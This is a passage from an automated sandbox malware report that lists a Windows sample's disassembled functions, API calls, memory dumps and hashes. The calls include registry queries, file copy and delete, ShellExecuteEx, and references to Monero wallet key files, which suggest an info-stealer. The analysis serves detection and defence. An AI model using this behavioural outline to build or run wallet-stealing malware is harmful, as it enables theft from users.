                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: d64c9dbf844afd8fec059324f6f6724c75fe3623eac015c632c02d6f92831208
                              • Instruction ID: 082814f6d9aceca3869486122b8837fef2b73a26c9e860e243b01101ecd16051
                              • Opcode Fuzzy Hash: d64c9dbf844afd8fec059324f6f6724c75fe3623eac015c632c02d6f92831208
                              • Instruction Fuzzy Hash: B84136B69101086BDB14FBA0DC56FFE737DABC8300F408958B61A97191EE755BC88B92
                              Function 00946920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 0094696C
                              • sscanf.NTDLL ref: 00946999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009469B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009469C0
                              • ExitProcess.KERNEL32 ref: 009469DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 90556541c18bcc4e00ab5846a8862590d30c01e675ec810e49d8745d3099aed4
                              • Instruction ID: 1a33a7592e363b96728b3b579c205a8d2b6f067eb85f8be201709affaeb25968
                              • Opcode Fuzzy Hash: 90556541c18bcc4e00ab5846a8862590d30c01e675ec810e49d8745d3099aed4
                              • Instruction Fuzzy Hash: A721EDB5D14208ABCF44EFE4D945AEEB7B9FF88300F04452EE40AE3250EB345605CB66
                              Function 00947E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00947E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,010EBC30,00000000,00020119,?), ref: 00947E5E
                              • RegQueryValueExA.ADVAPI32(?,010FD300,00000000,00000000,000000FF,000000FF), ref: 00947E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00947E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 0094cd8be22f880ee20b2101ae6d5c608075f3914c60c5d05ae487811259668d
                              • Instruction ID: 0a4364deea0058c03ef07c25006cb45593646a869f9e85812f7d82d2b35225f8
                              • Opcode Fuzzy Hash: 0094cd8be22f880ee20b2101ae6d5c608075f3914c60c5d05ae487811259668d
                              • Instruction Fuzzy Hash: 59118FB1A44209EBD714CFD4DC49F7FBBB8EB84701F104259F609A7290DB7459008BA2
                              Function 00949260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(010FDCD8,?,?,?,0094140C,?,010FDCD8,00000000), ref: 0094926C
                              • lstrcpyn.KERNEL32(00B7AB88,010FDCD8,010FDCD8,?,0094140C,?,010FDCD8), ref: 00949290
                              • lstrlen.KERNEL32(?,?,0094140C,?,010FDCD8), ref: 009492A7
                              • wsprintfA.USER32 ref: 009492C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: c2f8e0a0e9068323b57844ee1236f2fa0826e3fda0a1ea4e6fbd2866c4c983f1
                              • Instruction ID: 5d1e7e5132ddff1c5b8a85b43fc11de4dad9db2425c51411496f0d2f239454a6
                              • Opcode Fuzzy Hash: c2f8e0a0e9068323b57844ee1236f2fa0826e3fda0a1ea4e6fbd2866c4c983f1
                              • Instruction Fuzzy Hash: 6401A975500108FFCB44DFE8C984EAE7BB9EB88355F108548F9199B304CA71AA40DB91
                              Function 009312A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009312B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009312BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009312D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009312F5
                              • RegCloseKey.ADVAPI32(?), ref: 009312FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 8aef21ada0ee6bef2d046a99f8350241ea5d1f4eeabdaaf6dcc820ba497a32b4
                              • Instruction ID: 3e7223f5cd3ca583ca51a5c2940504197db57c7e5ce8bfc2c69a6f51b6b4bdbc
                              • Opcode Fuzzy Hash: 8aef21ada0ee6bef2d046a99f8350241ea5d1f4eeabdaaf6dcc820ba497a32b4
                              • Instruction Fuzzy Hash: 0B0131B9A40208BBDB04DFE0DC49FAEB7BCEB88701F008159FA09972C0DA709A418F51
                              Function 0094C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: e648a6119ac9774517cb38b06df1bf7927437347615a2840a351a8d74d86f603
                              • Instruction ID: 0da47f9afac2de287cb48ddcf264414810c105ff7a520abf3eaefe304bcf3273
                              • Opcode Fuzzy Hash: e648a6119ac9774517cb38b06df1bf7927437347615a2840a351a8d74d86f603
                              • Instruction Fuzzy Hash: DF41F9B150175C6EDB258B24CD94FFBBBECAF45704F1448E8E9CA86182E2719A44DF60
                              Function 00946630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00946663
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00946726
                              • ExitProcess.KERNEL32 ref: 00946755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: c8bca2c186ef9cda46be23cdc5e0d69ba9fc438e23b69b5f0368e9462ddf4808
                              • Instruction ID: 5ef11e5ac72541ba97acbc38d02fe2a1fafba77e28370ebebd7c4167d954b4bb
                              • Opcode Fuzzy Hash: c8bca2c186ef9cda46be23cdc5e0d69ba9fc438e23b69b5f0368e9462ddf4808
                              • Instruction Fuzzy Hash: BF3130B1C01218ABDB54EB50DC91FDE7778AF84300F404189F20967291DF746B89CF5A
                              Function 009487C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00950E28,00000000,?), ref: 0094882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00948836
                              • wsprintfA.USER32 ref: 00948850
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 7739379b8e0b8ee5ca7a24a0327f689610408da5c553e874408186724d81cce4
                              • Instruction ID: f8149925322e660cdcb3e02c22269b2b49f6234f4054d20cecd45669f7074308
                              • Opcode Fuzzy Hash: 7739379b8e0b8ee5ca7a24a0327f689610408da5c553e874408186724d81cce4
                              • Instruction Fuzzy Hash: 7E2142B1E40204AFDB44DFD4DD45FAEBBB8FB88701F104159F609A7280CB79A941CBA2
                              Function 00948D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0094951E,00000000), ref: 00948D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00948D62
                              • wsprintfW.USER32 ref: 00948D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 39a21b5e21a297be19598b4a067ef0df70ad014a7845b17ab89c119d483daae1
                              • Instruction ID: 2b3acd3e2186c984837a1c42018760e4f07c01690cb3dfa78ae20073a18ad9bc
                              • Opcode Fuzzy Hash: 39a21b5e21a297be19598b4a067ef0df70ad014a7845b17ab89c119d483daae1
                              • Instruction Fuzzy Hash: 60E08CB0A40208BBC740DB94DC0AE6D77BCEB84702F040094FE0D87280DE719E408BA2
                              Function 0093A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,010F9920,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0093A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0093A3FF
                              • lstrlen.KERNEL32(00000000), ref: 0093A6BC
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 0093A743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: bebad33425f71dc38c446e8fe2c22a1c004702e63dcc776d08ae00accdf4f7d5
                              • Instruction ID: b08f38d13b32de1721b6118215285e6a82169c1ee6d0879f59621966dee58808
                              • Opcode Fuzzy Hash: bebad33425f71dc38c446e8fe2c22a1c004702e63dcc776d08ae00accdf4f7d5
                              • Instruction Fuzzy Hash: B3E1EE72850108AAEB19FBA4DC92FEE7338EF94304F508159F517721A1EF306A4DCB66
                              Function 0093D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,010F9920,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0093D481
                              • lstrlen.KERNEL32(00000000), ref: 0093D698
                              • lstrlen.KERNEL32(00000000), ref: 0093D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0093D72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
